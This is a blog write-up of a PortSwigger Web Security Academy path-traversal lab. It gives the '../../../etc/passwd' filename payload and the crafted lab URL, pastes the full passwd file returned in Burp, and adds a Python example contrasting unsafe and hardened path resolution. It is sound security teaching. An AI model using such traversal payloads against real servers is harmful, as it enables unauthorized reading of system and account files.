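From the Burp Suite (bp) academy, which provides lab targets and is a good place to learn.
Server-side vulnerabilities: path traversal
The idea: if a website serves its images directly through something like src="/loadImage?filename=xxx.jpg", then a crafted parameter such as "filename=../../../etc/passwd" returns the server's passwd file, which reveals the user accounts on the server.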
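The flaw described above, with the vulnerable path handling beside a hardened form. This is an added example, not code from the lab or the original post; the function names and the var/www/images layout are assumptions, and all files are constructed in a temporary directory.

```python
import os
import tempfile


def resolve_unsafe(base_dir, filename):
    # Vulnerable pattern: the parameter is joined to the image directory
    # unchecked, so "../" segments (or an absolute path) leave it.
    return os.path.normpath(os.path.join(base_dir, filename))


def resolve_safe(base_dir, filename):
    """Return the canonical path if it is a file inside base_dir, else None."""
    base = os.path.realpath(base_dir)
    # realpath collapses ".." and follows symlinks before the comparison.
    candidate = os.path.realpath(os.path.join(base, filename))
    if os.path.commonpath([base, candidate]) != base:
        return None  # resolved outside the image directory: reject
    return candidate if os.path.isfile(candidate) else None


def demo():
    """Build a constructed directory tree and compare both resolvers."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        root = os.path.realpath(tmp)
        images = os.path.join(root, "var", "www", "images")  # assumed layout
        os.makedirs(images)
        os.makedirs(os.path.join(root, "etc"))
        with open(os.path.join(images, "xxx.jpg"), "wb") as fh:
            fh.write(b"\xff\xd8\xff")  # constructed stand-in for a JPEG
        secret = os.path.join(root, "etc", "passwd")
        with open(secret, "w") as fh:
            fh.write("constructed:x:0:0::/:/bin/false\n")
        for name in ("xxx.jpg", "../../../etc/passwd", secret):
            unsafe = resolve_unsafe(images, name)
            results[name if name != secret else "<absolute>"] = (
                unsafe.startswith(images + os.sep),  # unsafe stayed inside?
                resolve_safe(images, name) is not None,  # safe allowed it?
            )
    return results


if __name__ == "__main__":
    for name, (inside, allowed) in demo().items():
        print(f"{name!r}: unsafe stays inside={inside}, safe allows={allowed}")
```

The absolute-path case is included because `os.path.join` discards the base directory when the second argument is absolute, so filtering "../" alone is not enough.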
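Here is the lab address: https://portswigger.net/web-security/learning-paths/server-side-vulnerabilities-apprentice/path-traversal-apprentice/file-path-traversal/lab-simple#
Following the tutorial, find the URL that loads the images and construct the request URL: https://0af600c50370bec8851f5f9900f8009d.web-security-academy.net/image?filename=../../../etc/passwd
Strangely, opening this URL in a browser loads nothing.
My guess is that the response header declares the content as an image, so the browser parses it as an image. In Burp (bp) the response is visible.
Pasting the whole response here: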
    HTTP/2 200 OK
    Content-Type: image/jpeg
    X-Frame-Options: SAMEORIGIN
    Content-Length: 2316

    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
    bin:x:2:2:bin:/bin:/usr/sbin/nologin
    sys:x:3:3:sys:/dev:/usr/sbin/nologin
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/usr/sbin/nologin
    man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
    lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
    mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
    news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
    uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
    proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
    www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
    backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
    list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
    irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
    nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
    _apt:x:100:65534::/nonexistent:/usr/sbin/nologin
    peter:x:12001:12001::/home/peter:/bin/bash
    carlos:x:12002:12002::/home/carlos:/bin/bash
    user:x:12000:12000::/home/user:/bin/bash
    elmer:x:12099:12099::/home/elmer:/bin/bash
    academy:x:10000:10000::/academy:/bin/bash
    messagebus:x:101:101::/nonexistent:/usr/sbin/nologin
    dnsmasq:x:102:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
    systemd-timesync:x:103:103:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
    systemd-network:x:104:105:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
    systemd-resolve:x:105:106:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
    mysql:x:106:107:MySQL Server,,,:/nonexistent:/bin/false
    postgres:x:107:110:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
    usbmux:x:108:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
    rtkit:x:109:115:RealtimeKit,,,:/proc:/usr/sbin/nologin
    mongodb:x:110:117::/var/lib/mongodb:/usr/sbin/nologin
    avahi:x:111:118:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
    cups-pk-helper:x:112:119:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
    geoclue:x:113:120::/var/lib/geoclue:/usr/sbin/nologin
    saned:x:114:122::/var/lib/saned:/usr/sbin/nologin
    colord:x:115:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
    pulse:x:116:124:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
    gdm:x:117:126:Gnome Display Manager:/var/lib/gdm3:/bin/false

From: https://www.cnblogs.com/superxuezhazha/p/18180226